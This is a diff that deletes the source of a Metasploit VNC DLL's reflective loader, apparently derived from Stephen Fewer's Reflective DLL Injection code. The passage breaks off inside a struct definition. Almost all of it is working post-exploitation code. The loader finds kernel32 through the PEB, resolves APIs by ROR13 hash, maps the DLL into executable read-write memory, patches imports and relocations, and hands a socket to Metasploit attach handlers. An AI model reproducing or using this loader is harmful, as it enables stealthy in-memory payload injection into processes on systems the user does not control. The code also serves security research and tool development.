if( dwMeterpreterArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
//===============================================================================================//


@ -1,37 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H
#define _VNCDLL_LOADER_LOADLIBRARYR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,451 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//


@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
